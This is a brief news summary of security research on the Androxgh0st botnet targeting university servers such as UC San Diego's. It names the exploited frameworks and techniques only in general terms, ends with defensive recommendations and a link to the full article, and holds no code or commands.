Recent CloudSEK findings reveal the evolution of the Androxgh0st botnet, now targeting academic institutions like UC San Diego through advanced techniques such as RCE and web shells. The threat actors exploit vulnerabilities in popular frameworks and utilize legitimate domains for malicious activity, prompting urgent protective measures. #Androxgh0st #UCSD #CISA #JNDIInjection #ApacheShiro
Keypoints
- The Androxgh0st botnet has expanded its attack methods by approximately 50% since early 2024.
- Academic institutions, including UC San Diego, have been targeted via misconfigured servers and legitimate but vulnerable domains.
- The botnet exploits vulnerabilities in frameworks like Apache Shiro, Spring, and WordPress plugins to gain access.
- It uses advanced techniques like JNDI and OGNL injection for remote code execution and persistence.
- Organizations are advised to patch affected systems, restrict network traffic, and monitor for suspicious activity.
Read More: https://hackread.com/androxgh0st-botnet-expand-exploit-us-university-servers/